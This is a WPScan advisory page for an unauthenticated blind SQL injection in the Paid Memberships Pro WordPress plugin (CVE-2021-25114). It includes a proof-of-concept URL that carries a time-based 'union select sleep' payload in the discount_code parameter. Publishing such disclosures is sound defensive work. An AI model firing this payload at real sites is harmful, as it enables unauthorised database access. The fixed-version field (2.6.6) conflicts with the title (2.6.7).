WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Paid Memberships Pro < 2.6.7 - Unauthenticated Blind SQL Injection

Description

The plugin does not escape the discount_code in one of its REST route (available to unauthenticated users) before using it in a SQL statement, leading to a SQL injection

Proof of Concept

https://example.com/?rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(1)%20--%20g

Affects Plugins

paid-memberships-pro
Fixed in version 2.6.6

References

CVE
CVE-2021-25114
URL
https://www.paidmembershipspro.com/pmpro-update-2-6-7-security-release/

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc/
Verified

Yes

WPVDB ID
6c25a5f0-a137-4ea5-9422-8ae393d7b76b

Timeline

Publicly Published

2022-01-07 (about 8 months ago)

Added

2022-01-07 (about 8 months ago)

Last Updated

2022-04-12 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin